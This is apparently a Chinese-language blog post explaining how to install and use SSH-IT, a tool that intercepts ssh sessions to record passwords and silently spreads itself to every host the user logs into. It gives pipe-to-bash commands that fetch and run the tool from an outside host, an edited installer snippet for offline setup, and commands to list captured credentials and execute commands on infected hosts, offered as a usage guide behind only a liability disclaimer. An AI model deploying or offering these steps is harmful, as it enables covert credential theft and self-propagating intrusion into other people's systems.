SSH-IT凭证窃取

免责声明:由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本篇文章作者不为此承担任何责任,一旦造成后果请自行承担!

介绍

SSH-IT可以记录登录其他主机的密码,每次用户使用 ssh 时,SSH-IT会获取SSH 连接,并(秘密)将自己安装到新连接的系统上,SSH-IT 会不断拦截、记录和传播。

工具原理

SSH-IT 会在伪造的 PTY 线束内执行原始 ssh 命令,并拦截任何用户输入和输出。它不会修改任何系统二进制文件,不需要 ptrace(),权限不需要指定 root 或超级用户权限。

安装

访问官网SSH-IT 执行官方下载&运行命令

bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
or:
bash -c "$(wget --no-verbose -O- https://thc.org/ssh-it/x)"

若在下载过程中下载SSH-IT程序失败时,可以手动下载并修改x代码进行安装运行

https://github.com/hackerschoice/binary/blob/main/ssh-it/ssh-it-pkg.tar.gz

下载完成后修改x代码(注释掉下载,修改解压文件路径)

image

init_vars

#echo -en 2>&1 "Downloading binaries.................................................."
#dl "${PKG_TGZ}" "${THC_TMPDIR}/${PKG_TGZ}"
OK_OUT

echo -en 2>&1 "Unpacking binaries...................................................."
# Unpack (suppress "tar: warning: skipping header 'x'" on alpine linux
(tar xfz "${PKG_TGZ}" 2>/dev/null) || { FAIL_OUT "unpacking failed"; errexit; }
[[ ! -f "${PKG_NAME}/hook.sh" ]] && { FAIL_OUT "unpacking failed"; errexit; }
OK_OUT

然后重新执行x程序即可

使用

上面安装成功后默认运行,假设上面是主机A,主机A登录主机B,在主机A上查看日志记录(注:如果AB之间免密登录那么通过此命令在主机A上将无法记录密码,提示auth key)

~/.config/prng/thc_cli -r list

image

查看主机B发现已经存在SSH-IT程序
image
执行命令

~/.config/prng/thc_cli -r exec 'id'

image

清除程序命令

~/.config/prng/thc_cli -r uninstall

其他命令参考
https://www.thc.org/ssh-it/deploy/

posted @ 2023-11-14 20:23  axing的星空  阅读(49)  评论(0编辑  收藏  举报